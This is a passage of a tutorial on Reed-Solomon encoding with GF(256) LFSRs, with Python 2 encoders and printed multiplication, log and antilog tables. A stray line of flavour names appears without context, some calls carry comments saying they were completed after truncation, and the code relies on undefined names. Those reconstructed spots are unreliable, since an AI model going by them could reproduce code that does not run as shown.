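        pivot = next(i for i in xrange(c, len(A)) if A[i][c] != 0)
        A[c], A[pivot] = A[pivot], A[c]
        b[c], b[pivot] = b[pivot], b[c]
        inv = field.divraw(1, A[c][c])
        A[c] = [field.mulraw(inv, a) for a in A[c]]
        b[c] = field.mulraw(inv, b[c])
        for i in xrange(len(A)):
            if i != c and A[i][c] != 0:
                f = A[i][c]
                A[i] = [a ^ field.mulraw(f, ac) for a, ac in zip(A[i], A[c])]
                b[i] ^= field.mulraw(f, b[c])
    return b[:ncols]

positions = [200, 180, 105]        # arbitrary known error locations
true_values = [0x42, 0x17, 0x99]   # arbitrary error values
columns = [x_to_the_i_mod_g(i) for i in positions]
# the remainder the receiver would see: e(x) mod g(x)
received = [0]*16
for v, col in zip(true_values, columns):
    for row in xrange(16):
        received[row] ^= f256.mulraw(v, col[row])
A = [[col[row] for col in columns] for row in xrange(16)]
print [hex(v) for v in solve_gf256(A, received, f256)]
# expect ['0x42', '0x17', '0x99']

The three recovered values match the ones we planted, which is exactly the linear-independence property doing its job.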
Chocolate Strawberry Peach Vanilla Banana Pistachio Peppermint Lemon Orange Butterscotch
We can handle Reed-Solomon encoding in either software or hardware (and at least the remainder-calculating part of the decoder) using LFSRs. Now, we have to loosen up what we mean by an LFSR. So far, all the LFSRs have dealt directly with binary bits, and each shift cell either has a tap, or doesn’t, depending on the coefficients of the polynomial associated with the LFSR. For Reed-Solomon, the units of computation are elements of \( GF(256) \), represented as 8-bit bytes for a particular degree-8 primitive polynomial. So the shift cells, instead of containing bits, will contain bytes, and the taps will change from simple taps to multipliers over \( GF(256) \). (This gets a little hairy in hardware, but it’s not that bad.) A 10-byte LFSR over \( GF(256) \) implementing Reed-Solomon encoding would look something like this:
We would feed the bytes \( b[k] \) of the message in at the right; bytes \( r_0 \) through \( r_9 \) represent a remainder, and coefficients \( p_0 \) through \( p_9 \) represent the non-leading coefficients of the RS code’s generator polynomial. In this case, we would use a 10th-degree generator polynomial whose leading coefficient is 1.
For each new byte, we do two things:
- Shift all cells left, shifting in one byte of the message
- Take the byte shifted out, and multiply it by the generator polynomial, then add (XOR) with the contents of the shift register.
We also have to remember to do this another \( n-k \) times (the length of the shift register) to cover the \( x^{n-k} \) factor. (Remember, we’re trying to calculate \( r(x) = x^{n-k}M(x) \bmod g(x) \).)
f256 = GF2QuotientRing(0x11d)
g = g256   # assumption: the RS(255,239) generator computed above, ascending order

def rsencode_lfsr1(field, message, gtaps, remainder_only=False):
    """
    encode a message in Reed-Solomon using LFSR
    field: symbol field
    message: string of bytes
    gtaps: generator polynomial coefficients, in ascending order
    remainder_only: whether to return the remainder only
    """
    glength = len(gtaps)
    remainder = np.zeros(glength, np.int)
    for char in message + '\0'*glength:
        remainder = np.roll(remainder, 1)
        out = remainder[0]
        remainder[0] = ord(char)
        for k, c in enumerate(gtaps):
            remainder[k] ^= field.mulraw(c, out)
    remainder = ''.join(chr(b) for b in reversed(remainder))
    return remainder if remainder_only else message+remainder

print rsencode_lfsr1(f256, msg, g[:-1], remainder_only=True).encode('hex')
# assumption: the tail of this call was truncated in the source;
# completed here to match the log-table example below
That worked, but we still have to handle multiplication in the symbol field, which is annoying and cumbersome for embedded processors. There are two table-driven methods that make this step easier, relegating the finite field stuff either to initialization steps only, or something that can be done at design time if you’re willing to generate a table in source code. (For example, using Python to generate the table coefficients in C.)
Also we have that call to np.roll(), which is too high-level for a language like C, so let’s look at things from this low-level, table-driven approach.
One table method is to take the generator polynomial and multiply it by each of the 256 possible coefficients, so that we get a table of 256 × \( n-k \) bytes.
def rsencode_lfsr2_table(field, gtaps):
    """
    Create a table for Reed-Solomon encoding using a field
    This time the taps are in *descending* order
    """
    return [[field.mulraw(b,c) for c in gtaps] for b in xrange(256)]

def rsencode_lfsr2(table, message, remainder_only=False):
    """
    encode a message in Reed-Solomon using LFSR
    table: table[i][j] is the multiplication of generator coefficient
           of x^{n-k-1-j} by incoming byte i
    message: string of bytes
    remainder_only: whether to return the remainder only
    """
    glength = len(table[0])
    remainder = [0]*glength
    for char in message + '\0'*glength:
        out = remainder[0]
        table_row = table[out]
        for k in xrange(glength-1):
            remainder[k] = remainder[k+1] ^ table_row[k]
        remainder[glength-1] = ord(char) ^ table_row[glength-1]
    remainder = ''.join(chr(b) for b in remainder)
    return remainder if remainder_only else message+remainder

table = rsencode_lfsr2_table(f256, g[-2::-1])
print "table:"
for k, row in enumerate(table):
    print "%02x: %s" % (k, ' '.join('%02x' % c for c in row))
table: 00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01: 3b 0d 68 bd 44 d1 1e 08 a3 41 29 e5 62 32 24 3b 02: 76 1a d0 67 88 bf 3c 10 5b 82 52 d7 c4 64 48 76 03: 4d 17 b8 da cc 6e 22 18 f8 c3 7b 32 a6 56 6c 4d 04: ec 34 bd ce 0d 63 78 20 b6 19 a4 b3 95 c8 90 ec 05: d7 39 d5 73 49 b2 66 28 15 58 8d 56 f7 fa b4 d7 06: 9a 2e 6d a9 85 dc 44 30 ed 9b f6 64 51 ac d8 9a 07: a1 23 05 14 c1 0d 5a 38 4e da df 81 33 9e fc a1 08: c5 68 67 81 1a c6 f0 40 71 32 55 7b 37 8d 3d c5 09: fe 65 0f 3c 5e 17 ee 48 d2 73 7c 9e 55 bf 19 fe 0a: b3 72 b7 e6 92 79 cc 50 2a b0 07 ac f3 e9 75 b3 0b: 88 7f df 5b d6 a8 d2 58 89 f1 2e 49 91 db 51 88 0c: 29 5c da 4f 17 a5 88 60 c7 2b f1 c8 a2 45 ad 29 0d: 12 51 b2 f2 53 74 96 68 64 6a d8 2d c0 77 89 12 0e: 5f 46 0a 28 9f 1a b4 70 9c a9 a3 1f 66 21 e5 5f 0f: 64 4b 62 95 db cb aa 78 3f e8 8a fa 04 13 c1 64 10: 97 d0 ce 1f 34 91 fd 80 e2 64 aa f6 6e 07 7a 97 11: ac dd a6 a2 70 40 e3 88 41 25 83 13 0c 35 5e ac 12: e1 ca 1e 78 bc 2e c1 90 b9 e6 f8 21 aa 63 32 e1 13: da c7 76 c5 f8 ff df 98 1a a7 d1 c4 c8 51 16 da 14: 7b e4 73 d1 39 f2 85 a0 54 7d 0e 45 fb cf ea 7b 15: 40 e9 1b 6c 7d 23 9b a8 f7 3c 27 a0 99 fd ce 40 16: 0d fe a3 b6 b1 4d b9 b0 0f ff 5c 92 3f ab a2 0d 17: 36 f3 cb 0b f5 9c a7 b8 ac be 75 77 5d 99 86 36 18: 52 b8 a9 9e 2e 57 0d c0 93 56 ff 8d 59 8a 47 52 19: 69 b5 c1 23 6a 86 13 c8 30 17 d6 68 3b b8 63 69 1a: 24 a2 79 f9 a6 e8 31 d0 c8 d4 ad 5a 9d ee 0f 24 1b: 1f af 11 44 e2 39 2f d8 6b 95 84 bf ff dc 2b 1f 1c: be 8c 14 50 23 34 75 e0 25 4f 5b 3e cc 42 d7 be 1d: 85 81 7c ed 67 e5 6b e8 86 0e 72 db ae 70 f3 85 1e: c8 96 c4 37 ab 8b 49 f0 7e cd 09 e9 08 26 9f c8 1f: f3 9b ac 8a ef 5a 57 f8 dd 8c 20 0c 6a 14 bb f3 20: 33 bd 81 3e 68 3f e7 1d d9 c8 49 f1 dc 0e f4 33 21: 08 b0 e9 83 2c ee f9 15 7a 89 60 14 be 3c d0 08 22: 45 a7 51 59 e0 80 db 0d 82 4a 1b 26 18 6a bc 45 23: 7e aa 39 e4 a4 51 c5 05 21 0b 32 c3 7a 58 98 7e 24: df 89 3c f0 65 5c 9f 3d 6f d1 ed 42 49 c6 64 df 25: e4 84 54 4d 21 8d 81 35 cc 90 c4 a7 2b f4 40 e4 26: a9 93 ec 97 ed e3 a3 2d 34 53 bf 95 8d a2 2c a9 27: 92 9e 84 2a a9 32 bd 25 97 12 96 70 ef 90 08 92 28: f6 d5 e6 bf 72 f9 17 5d a8 fa 1c 8a eb 83 c9 f6 29: cd d8 8e 02 36 28 09 55 0b bb 35 6f 89 b1 ed cd 2a: 80 cf 36 d8 fa 46 2b 4d f3 78 4e 5d 2f e7 81 80 2b: bb c2 5e 65 be 97 35 45 50 39 67 b8 4d d5 a5 bb 2c: 1a e1 5b 71 7f 9a 6f 7d 1e e3 b8 39 7e 4b 59 1a 2d: 21 ec 33 cc 3b 4b 71 75 bd a2 91 dc 1c 79 7d 21 2e: 6c fb 8b 16 f7 25 53 6d 45 61 ea ee ba 2f 11 6c 2f: 57 f6 e3 ab b3 f4 4d 65 e6 20 c3 0b d8 1d 35 57 30: a4 6d 4f 21 5c ae 1a 9d 3b ac e3 07 b2 09 8e a4 31: 9f 60 27 9c 18 7f 04 95 98 ed ca e2 d0 3b aa 9f 32: d2 77 9f 46 d4 11 26 8d 60 2e b1 d0 76 6d c6 d2 33: e9 7a f7 fb 90 c0 38 85 c3 6f 98 35 14 5f e2 e9 34: 48 59 f2 ef 51 cd 62 bd 8d b5 47 b4 27 c1 1e 48 35: 73 54 9a 52 15 1c 7c b5 2e f4 6e 51 45 f3 3a 73 36: 3e 43 22 88 d9 72 5e ad d6 37 15 63 e3 a5 56 3e 37: 05 4e 4a 35 9d a3 40 a5 75 76 3c 86 81 97 72 05 38: 61 05 28 a0 46 68 ea dd 4a 9e b6 7c 85 84 b3 61 39: 5a 08 40 1d 02 b9 f4 d5 e9 df 9f 99 e7 b6 97 5a 3a: 17 1f f8 c7 ce d7 d6 cd 11 1c e4 ab 41 e0 fb 17 3b: 2c 12 90 7a 8a 06 c8 c5 b2 5d cd 4e 23 d2 df 2c 3c: 8d 31 95 6e 4b 0b 92 fd fc 87 12 cf 10 4c 23 8d 3d: b6 3c fd d3 0f da 8c f5 5f c6 3b 2a 72 7e 07 b6 3e: fb 2b 45 09 c3 b4 ae ed a7 05 40 18 d4 28 6b fb 3f: c0 26 2d b4 87 65 b0 e5 04 44 69 fd b6 1a 4f c0 40: 66 67 1f 7c d0 7e d3 3a af 8d 92 ff a5 1c f5 66 41: 5d 6a 77 c1 94 af cd 32 0c cc bb 1a c7 2e d1 5d 42: 10 7d cf 1b 58 c1 ef 2a f4 0f c0 28 61 78 bd 10 43: 2b 70 a7 a6 1c 10 f1 22 57 4e e9 cd 03 4a 99 2b 44: 8a 53 
a2 b2 dd 1d ab 1a 19 94 36 4c 30 d4 65 8a 45: b1 5e ca 0f 99 cc b5 12 ba d5 1f a9 52 e6 41 b1 46: fc 49 72 d5 55 a2 97 0a 42 16 64 9b f4 b0 2d fc 47: c7 44 1a 68 11 73 89 02 e1 57 4d 7e 96 82 09 c7 48: a3 0f 78 fd ca b8 23 7a de bf c7 84 92 91 c8 a3 49: 98 02 10 40 8e 69 3d 72 7d fe ee 61 f0 a3 ec 98 4a: d5 15 a8 9a 42 07 1f 6a 85 3d 95 53 56 f5 80 d5 4b: ee 18 c0 27 06 d6 01 62 26 7c bc b6 34 c7 a4 ee 4c: 4f 3b c5 33 c7 db 5b 5a 68 a6 63 37 07 59 58 4f 4d: 74 36 ad 8e 83 0a 45 52 cb e7 4a d2 65 6b 7c 74 4e: 39 21 15 54 4f 64 67 4a 33 24 31 e0 c3 3d 10 39 4f: 02 2c 7d e9 0b b5 79 42 90 65 18 05 a1 0f 34 02 50: f1 b7 d1 63 e4 ef 2e ba 4d e9 38 09 cb 1b 8f f1 51: ca ba b9 de a0 3e 30 b2 ee a8 11 ec a9 29 ab ca 52: 87 ad 01 04 6c 50 12 aa 16 6b 6a de 0f 7f c7 87 53: bc a0 69 b9 28 81 0c a2 b5 2a 43 3b 6d 4d e3 bc 54: 1d 83 6c ad e9 8c 56 9a fb f0 9c ba 5e d3 1f 1d 55: 26 8e 04 10 ad 5d 48 92 58 b1 b5 5f 3c e1 3b 26 56: 6b 99 bc ca 61 33 6a 8a a0 72 ce 6d 9a b7 57 6b 57: 50 94 d4 77 25 e2 74 82 03 33 e7 88 f8 85 73 50 58: 34 df b6 e2 fe 29 de fa 3c db 6d 72 fc 96 b2 34 59: 0f d2 de 5f ba f8 c0 f2 9f 9a 44 97 9e a4 96 0f 5a: 42 c5 66 85 76 96 e2 ea 67 59 3f a5 38 f2 fa 42 5b: 79 c8 0e 38 32 47 fc e2 c4 18 16 40 5a c0 de 79 5c: d8 eb 0b 2c f3 4a a6 da 8a c2 c9 c1 69 5e 22 d8 5d: e3 e6 63 91 b7 9b b8 d2 29 83 e0 24 0b 6c 06 e3 5e: ae f1 db 4b 7b f5 9a ca d1 40 9b 16 ad 3a 6a ae 5f: 95 fc b3 f6 3f 24 84 c2 72 01 b2 f3 cf 08 4e 95 60: 55 da 9e 42 b8 41 34 27 76 45 db 0e 79 12 01 55 61: 6e d7 f6 ff fc 90 2a 2f d5 04 f2 eb 1b 20 25 6e 62: 23 c0 4e 25 30 fe 08 37 2d c7 89 d9 bd 76 49 23 63: 18 cd 26 98 74 2f 16 3f 8e 86 a0 3c df 44 6d 18 64: b9 ee 23 8c b5 22 4c 07 c0 5c 7f bd ec da 91 b9 65: 82 e3 4b 31 f1 f3 52 0f 63 1d 56 58 8e e8 b5 82 66: cf f4 f3 eb 3d 9d 70 17 9b de 2d 6a 28 be d9 cf 67: f4 f9 9b 56 79 4c 6e 1f 38 9f 04 8f 4a 8c fd f4 68: 90 b2 f9 c3 a2 87 c4 67 07 77 8e 75 4e 9f 3c 90 69: ab bf 91 7e e6 56 da 6f a4 36 a7 90 2c ad 18 ab 6a: e6 a8 29 a4 2a 38 f8 77 5c f5 dc a2 8a fb 74 e6 6b: dd a5 41 19 6e e9 e6 7f ff b4 f5 47 e8 c9 50 dd 6c: 7c 86 44 0d af e4 bc 47 b1 6e 2a c6 db 57 ac 7c 6d: 47 8b 2c b0 eb 35 a2 4f 12 2f 03 23 b9 65 88 47 6e: 0a 9c 94 6a 27 5b 80 57 ea ec 78 11 1f 33 e4 0a 6f: 31 91 fc d7 63 8a 9e 5f 49 ad 51 f4 7d 01 c0 31 70: c2 0a 50 5d 8c d0 c9 a7 94 21 71 f8 17 15 7b c2 71: f9 07 38 e0 c8 01 d7 af 37 60 58 1d 75 27 5f f9 72: b4 10 80 3a 04 6f f5 b7 cf a3 23 2f d3 71 33 b4 73: 8f 1d e8 87 40 be eb bf 6c e2 0a ca b1 43 17 8f 74: 2e 3e ed 93 81 b3 b1 87 22 38 d5 4b 82 dd eb 2e 75: 15 33 85 2e c5 62 af 8f 81 79 fc ae e0 ef cf 15 76: 58 24 3d f4 09 0c 8d 97 79 ba 87 9c 46 b9 a3 58 77: 63 29 55 49 4d dd 93 9f da fb ae 79 24 8b 87 63 78: 07 62 37 dc 96 16 39 e7 e5 13 24 83 20 98 46 07 79: 3c 6f 5f 61 d2 c7 27 ef 46 52 0d 66 42 aa 62 3c 7a: 71 78 e7 bb 1e a9 05 f7 be 91 76 54 e4 fc 0e 71 7b: 4a 75 8f 06 5a 78 1b ff 1d d0 5f b1 86 ce 2a 4a 7c: eb 56 8a 12 9b 75 41 c7 53 0a 80 30 b5 50 d6 eb 7d: d0 5b e2 af df a4 5f cf f0 4b a9 d5 d7 62 f2 d0 7e: 9d 4c 5a 75 13 ca 7d d7 08 88 d2 e7 71 34 9e 9d 7f: a6 41 32 c8 57 1b 63 df ab c9 fb 02 13 06 ba a6 80: cc ce 3e f8 bd fc bb 74 43 07 39 e3 57 38 f7 cc 81: f7 c3 56 45 f9 2d a5 7c e0 46 10 06 35 0a d3 f7 82: ba d4 ee 9f 35 43 87 64 18 85 6b 34 93 5c bf ba 83: 81 d9 86 22 71 92 99 6c bb c4 42 d1 f1 6e 9b 81 84: 20 fa 83 36 b0 9f c3 54 f5 1e 9d 50 c2 f0 67 20 85: 1b f7 eb 8b f4 4e dd 5c 56 5f b4 b5 a0 c2 43 1b 86: 56 e0 53 51 38 20 ff 44 ae 9c cf 87 06 94 2f 56 87: 6d ed 3b ec 7c f1 e1 4c 0d dd e6 62 64 a6 0b 6d 88: 09 a6 59 79 a7 3a 4b 34 
32 35 6c 98 60 b5 ca 09 89: 32 ab 31 c4 e3 eb 55 3c 91 74 45 7d 02 87 ee 32 8a: 7f bc 89 1e 2f 85 77 24 69 b7 3e 4f a4 d1 82 7f 8b: 44 b1 e1 a3 6b 54 69 2c ca f6 17 aa c6 e3 a6 44 8c: e5 92 e4 b7 aa 59 33 14 84 2c c8 2b f5 7d 5a e5 8d: de 9f 8c 0a ee 88 2d 1c 27 6d e1 ce 97 4f 7e de 8e: 93 88 34 d0 22 e6 0f 04 df ae 9a fc 31 19 12 93 8f: a8 85 5c 6d 66 37 11 0c 7c ef b3 19 53 2b 36 a8 90: 5b 1e f0 e7 89 6d 46 f4 a1 63 93 15 39 3f 8d 5b 91: 60 13 98 5a cd bc 58 fc 02 22 ba f0 5b 0d a9 60 92: 2d 04 20 80 01 d2 7a e4 fa e1 c1 c2 fd 5b c5 2d 93: 16 09 48 3d 45 03 64 ec 59 a0 e8 27 9f 69 e1 16 94: b7 2a 4d 29 84 0e 3e d4 17 7a 37 a6 ac f7 1d b7 95: 8c 27 25 94 c0 df 20 dc b4 3b 1e 43 ce c5 39 8c 96: c1 30 9d 4e 0c b1 02 c4 4c f8 65 71 68 93 55 c1 97: fa 3d f5 f3 48 60 1c cc ef b9 4c 94 0a a1 71 fa 98: 9e 76 97 66 93 ab b6 b4 d0 51 c6 6e 0e b2 b0 9e 99: a5 7b ff db d7 7a a8 bc 73 10 ef 8b 6c 80 94 a5 9a: e8 6c 47 01 1b 14 8a a4 8b d3 94 b9 ca d6 f8 e8 9b: d3 61 2f bc 5f c5 94 ac 28 92 bd 5c a8 e4 dc d3 9c: 72 42 2a a8 9e c8 ce 94 66 48 62 dd 9b 7a 20 72 9d: 49 4f 42 15 da 19 d0 9c c5 09 4b 38 f9 48 04 49 9e: 04 58 fa cf 16 77 f2 84 3d ca 30 0a 5f 1e 68 04 9f: 3f 55 92 72 52 a6 ec 8c 9e 8b 19 ef 3d 2c 4c 3f a0: ff 73 bf c6 d5 c3 5c 69 9a cf 70 12 8b 36 03 ff a1: c4 7e d7 7b 91 12 42 61 39 8e 59 f7 e9 04 27 c4 a2: 89 69 6f a1 5d 7c 60 79 c1 4d 22 c5 4f 52 4b 89 a3: b2 64 07 1c 19 ad 7e 71 62 0c 0b 20 2d 60 6f b2 a4: 13 47 02 08 d8 a0 24 49 2c d6 d4 a1 1e fe 93 13 a5: 28 4a 6a b5 9c 71 3a 41 8f 97 fd 44 7c cc b7 28 a6: 65 5d d2 6f 50 1f 18 59 77 54 86 76 da 9a db 65 a7: 5e 50 ba d2 14 ce 06 51 d4 15 af 93 b8 a8 ff 5e a8: 3a 1b d8 47 cf 05 ac 29 eb fd 25 69 bc bb 3e 3a a9: 01 16 b0 fa 8b d4 b2 21 48 bc 0c 8c de 89 1a 01 aa: 4c 01 08 20 47 ba 90 39 b0 7f 77 be 78 df 76 4c ab: 77 0c 60 9d 03 6b 8e 31 13 3e 5e 5b 1a ed 52 77 ac: d6 2f 65 89 c2 66 d4 09 5d e4 81 da 29 73 ae d6 ad: ed 22 0d 34 86 b7 ca 01 fe a5 a8 3f 4b 41 8a ed ae: a0 35 b5 ee 4a d9 e8 19 06 66 d3 0d ed 17 e6 a0 af: 9b 38 dd 53 0e 08 f6 11 a5 27 fa e8 8f 25 c2 9b b0: 68 a3 71 d9 e1 52 a1 e9 78 ab da e4 e5 31 79 68 b1: 53 ae 19 64 a5 83 bf e1 db ea f3 01 87 03 5d 53 b2: 1e b9 a1 be 69 ed 9d f9 23 29 88 33 21 55 31 1e b3: 25 b4 c9 03 2d 3c 83 f1 80 68 a1 d6 43 67 15 25 b4: 84 97 cc 17 ec 31 d9 c9 ce b2 7e 57 70 f9 e9 84 b5: bf 9a a4 aa a8 e0 c7 c1 6d f3 57 b2 12 cb cd bf b6: f2 8d 1c 70 64 8e e5 d9 95 30 2c 80 b4 9d a1 f2 b7: c9 80 74 cd 20 5f fb d1 36 71 05 65 d6 af 85 c9 b8: ad cb 16 58 fb 94 51 a9 09 99 8f 9f d2 bc 44 ad b9: 96 c6 7e e5 bf 45 4f a1 aa d8 a6 7a b0 8e 60 96 ba: db d1 c6 3f 73 2b 6d b9 52 1b dd 48 16 d8 0c db bb: e0 dc ae 82 37 fa 73 b1 f1 5a f4 ad 74 ea 28 e0 bc: 41 ff ab 96 f6 f7 29 89 bf 80 2b 2c 47 74 d4 41 bd: 7a f2 c3 2b b2 26 37 81 1c c1 02 c9 25 46 f0 7a be: 37 e5 7b f1 7e 48 15 99 e4 02 79 fb 83 10 9c 37 bf: 0c e8 13 4c 3a 99 0b 91 47 43 50 1e e1 22 b8 0c c0: aa a9 21 84 6d 82 68 4e ec 8a ab 1c f2 24 02 aa c1: 91 a4 49 39 29 53 76 46 4f cb 82 f9 90 16 26 91 c2: dc b3 f1 e3 e5 3d 54 5e b7 08 f9 cb 36 40 4a dc c3: e7 be 99 5e a1 ec 4a 56 14 49 d0 2e 54 72 6e e7 c4: 46 9d 9c 4a 60 e1 10 6e 5a 93 0f af 67 ec 92 46 c5: 7d 90 f4 f7 24 30 0e 66 f9 d2 26 4a 05 de b6 7d c6: 30 87 4c 2d e8 5e 2c 7e 01 11 5d 78 a3 88 da 30 c7: 0b 8a 24 90 ac 8f 32 76 a2 50 74 9d c1 ba fe 0b c8: 6f c1 46 05 77 44 98 0e 9d b8 fe 67 c5 a9 3f 6f c9: 54 cc 2e b8 33 95 86 06 3e f9 d7 82 a7 9b 1b 54 ca: 19 db 96 62 ff fb a4 1e c6 3a ac b0 01 cd 77 19 cb: 22 d6 fe df bb 2a ba 16 65 7b 85 55 63 ff 53 22 cc: 83 f5 fb cb 7a 27 e0 2e 2b a1 5a d4 50 61 
af 83 cd: b8 f8 93 76 3e f6 fe 26 88 e0 73 31 32 53 8b b8 ce: f5 ef 2b ac f2 98 dc 3e 70 23 08 03 94 05 e7 f5 cf: ce e2 43 11 b6 49 c2 36 d3 62 21 e6 f6 37 c3 ce d0: 3d 79 ef 9b 59 13 95 ce 0e ee 01 ea 9c 23 78 3d d1: 06 74 87 26 1d c2 8b c6 ad af 28 0f fe 11 5c 06 d2: 4b 63 3f fc d1 ac a9 de 55 6c 53 3d 58 47 30 4b d3: 70 6e 57 41 95 7d b7 d6 f6 2d 7a d8 3a 75 14 70 d4: d1 4d 52 55 54 70 ed ee b8 f7 a5 59 09 eb e8 d1 d5: ea 40 3a e8 10 a1 f3 e6 1b b6 8c bc 6b d9 cc ea d6: a7 57 82 32 dc cf d1 fe e3 75 f7 8e cd 8f a0 a7 d7: 9c 5a ea 8f 98 1e cf f6 40 34 de 6b af bd 84 9c d8: f8 11 88 1a 43 d5 65 8e 7f dc 54 91 ab ae 45 f8 d9: c3 1c e0 a7 07 04 7b 86 dc 9d 7d 74 c9 9c 61 c3 da: 8e 0b 58 7d cb 6a 59 9e 24 5e 06 46 6f ca 0d 8e db: b5 06 30 c0 8f bb 47 96 87 1f 2f a3 0d f8 29 b5 dc: 14 25 35 d4 4e b6 1d ae c9 c5 f0 22 3e 66 d5 14 dd: 2f 28 5d 69 0a 67 03 a6 6a 84 d9 c7 5c 54 f1 2f de: 62 3f e5 b3 c6 09 21 be 92 47 a2 f5 fa 02 9d 62 df: 59 32 8d 0e 82 d8 3f b6 31 06 8b 10 98 30 b9 59 e0: 99 14 a0 ba 05 bd 8f 53 35 42 e2 ed 2e 2a f6 99 e1: a2 19 c8 07 41 6c 91 5b 96 03 cb 08 4c 18 d2 a2 e2: ef 0e 70 dd 8d 02 b3 43 6e c0 b0 3a ea 4e be ef e3: d4 03 18 60 c9 d3 ad 4b cd 81 99 df 88 7c 9a d4 e4: 75 20 1d 74 08 de f7 73 83 5b 46 5e bb e2 66 75 e5: 4e 2d 75 c9 4c 0f e9 7b 20 1a 6f bb d9 d0 42 4e e6: 03 3a cd 13 80 61 cb 63 d8 d9 14 89 7f 86 2e 03 e7: 38 37 a5 ae c4 b0 d5 6b 7b 98 3d 6c 1d b4 0a 38 e8: 5c 7c c7 3b 1f 7b 7f 13 44 70 b7 96 19 a7 cb 5c e9: 67 71 af 86 5b aa 61 1b e7 31 9e 73 7b 95 ef 67 ea: 2a 66 17 5c 97 c4 43 03 1f f2 e5 41 dd c3 83 2a eb: 11 6b 7f e1 d3 15 5d 0b bc b3 cc a4 bf f1 a7 11 ec: b0 48 7a f5 12 18 07 33 f2 69 13 25 8c 6f 5b b0 ed: 8b 45 12 48 56 c9 19 3b 51 28 3a c0 ee 5d 7f 8b ee: c6 52 aa 92 9a a7 3b 23 a9 eb 41 f2 48 0b 13 c6 ef: fd 5f c2 2f de 76 25 2b 0a aa 68 17 2a 39 37 fd f0: 0e c4 6e a5 31 2c 72 d3 d7 26 48 1b 40 2d 8c 0e f1: 35 c9 06 18 75 fd 6c db 74 67 61 fe 22 1f a8 35 f2: 78 de be c2 b9 93 4e c3 8c a4 1a cc 84 49 c4 78 f3: 43 d3 d6 7f fd 42 50 cb 2f e5 33 29 e6 7b e0 43 f4: e2 f0 d3 6b 3c 4f 0a f3 61 3f ec a8 d5 e5 1c e2 f5: d9 fd bb d6 78 9e 14 fb c2 7e c5 4d b7 d7 38 d9 f6: 94 ea 03 0c b4 f0 36 e3 3a bd be 7f 11 81 54 94 f7: af e7 6b b1 f0 21 28 eb 99 fc 97 9a 73 b3 70 af f8: cb ac 09 24 2b ea 82 93 a6 14 1d 60 77 a0 b1 cb f9: f0 a1 61 99 6f 3b 9c 9b 05 55 34 85 15 92 95 f0 fa: bd b6 d9 43 a3 55 be 83 fd 96 4f b7 b3 c4 f9 bd fb: 86 bb b1 fe e7 84 a0 8b 5e d7 66 52 d1 f6 dd 86 fc: 27 98 b4 ea 26 89 fa b3 10 0d b9 d3 e2 68 21 27 fd: 1c 95 dc 57 62 58 e4 bb b3 4c 90 36 80 5a 05 1c fe: 51 82 64 8d ae 36 c6 a3 4b 8f eb 04 26 0c 69 51 ff: 6a 8f 0c 30 ea e7 d8 ab e8 ce c2 e1 44 3e 4d 6a
print rsencode_lfsr2(table, msg, remainder_only=True).encode('hex')
# assumption: the tail of this call was truncated in the source;
# completed here to match the log-table example below
Alternatively, if none of the generator polynomial’s coefficients are zero, we can represent those coefficients as powers of a generating element of the symbol field, and then store log and antilog tables of powers of \( x \) in the symbol field. These are each a smaller table of length 256 (with one dummy entry), and they remove all dependencies on doing arithmetic in the symbol field.
def rsencode_lfsr3_table(field_polynomial):
    """
    Create log and antilog tables for Reed-Solomon encoding using a field
    This just uses powers of x^n.
    """
    log = [0] * 256
    antilog = [0] * 256
    c = 1
    for k in xrange(255):
        antilog[k] = c
        log[c] = k
        c <<= 1
        cxor = c ^ field_polynomial
        if cxor < c:
            c = cxor
    return log, antilog

def rsencode_lfsr3(log, antilog, gpowers, message, remainder_only=False):
    """
    encode a message in Reed-Solomon using LFSR
    log, antilog: tables for log and antilog: log[x^i] = i, antilog[i] = x^i
    gpowers: generator polynomial coefficients x^i, represented as i,
             in descending order
    message: string of bytes
    remainder_only: whether to return the remainder only
    """
    glength = len(gpowers)
    remainder = [0]*glength
    for char in message + '\0'*glength:
        out = remainder[0]
        if out == 0:
            # No multiplication. Just shift.
            for k in xrange(glength-1):
                remainder[k] = remainder[k+1]
            remainder[glength-1] = ord(char)
        else:
            outp = log[out]
            for k in xrange(glength-1):
                j = gpowers[k] + outp
                if j >= 255:
                    j -= 255
                remainder[k] = remainder[k+1] ^ antilog[j]
            j = gpowers[glength-1] + outp
            if j >= 255:
                j -= 255
            remainder[glength-1] = ord(char) ^ antilog[j]
    remainder = ''.join(chr(b) for b in remainder)
    return remainder if remainder_only else message+remainder

log, antilog = rsencode_lfsr3_table(f256.coeffs)
for (name, table) in [('log',log),('antilog',antilog)]:
    print "%s:" % name
    for k in xrange(0,256,16):
        print "%03d-%03d: %s" % (k,k+15,
            ' '.join('%02x' % c for c in table[k:k+16]))
log: 000-015: 00 00 01 19 02 32 1a c6 03 df 33 ee 1b 68 c7 4b 016-031: 04 64 e0 0e 34 8d ef 81 1c c1 69 f8 c8 08 4c 71 032-047: 05 8a 65 2f e1 24 0f 21 35 93 8e da f0 12 82 45 048-063: 1d b5 c2 7d 6a 27 f9 b9 c9 9a 09 78 4d e4 72 a6 064-079: 06 bf 8b 62 66 dd 30 fd e2 98 25 b3 10 91 22 88 080-095: 36 d0 94 ce 8f 96 db bd f1 d2 13 5c 83 38 46 40 096-111: 1e 42 b6 a3 c3 48 7e 6e 6b 3a 28 54 fa 85 ba 3d 112-127: ca 5e 9b 9f 0a 15 79 2b 4e d4 e5 ac 73 f3 a7 57 128-143: 07 70 c0 f7 8c 80 63 0d 67 4a de ed 31 c5 fe 18 144-159: e3 a5 99 77 26 b8 b4 7c 11 44 92 d9 23 20 89 2e 160-175: 37 3f d1 5b 95 bc cf cd 90 87 97 b2 dc fc be 61 176-191: f2 56 d3 ab 14 2a 5d 9e 84 3c 39 53 47 6d 41 a2 192-207: 1f 2d 43 d8 b7 7b a4 76 c4 17 49 ec 7f 0c 6f f6 208-223: 6c a1 3b 52 29 9d 55 aa fb 60 86 b1 bb cc 3e 5a 224-239: cb 59 5f b0 9c a9 a0 51 0b f5 16 eb 7a 75 2c d7 240-255: 4f ae d5 e9 e6 e7 ad e8 74 d6 f4 ea a8 50 58 af antilog: 000-015: 01 02 04 08 10 20 40 80 1d 3a 74 e8 cd 87 13 26 016-031: 4c 98 2d 5a b4 75 ea c9 8f 03 06 0c 18 30 60 c0 032-047: 9d 27 4e 9c 25 4a 94 35 6a d4 b5 77 ee c1 9f 23 048-063: 46 8c 05 0a 14 28 50 a0 5d ba 69 d2 b9 6f de a1 064-079: 5f be 61 c2 99 2f 5e bc 65 ca 89 0f 1e 3c 78 f0 080-095: fd e7 d3 bb 6b d6 b1 7f fe e1 df a3 5b b6 71 e2 096-111: d9 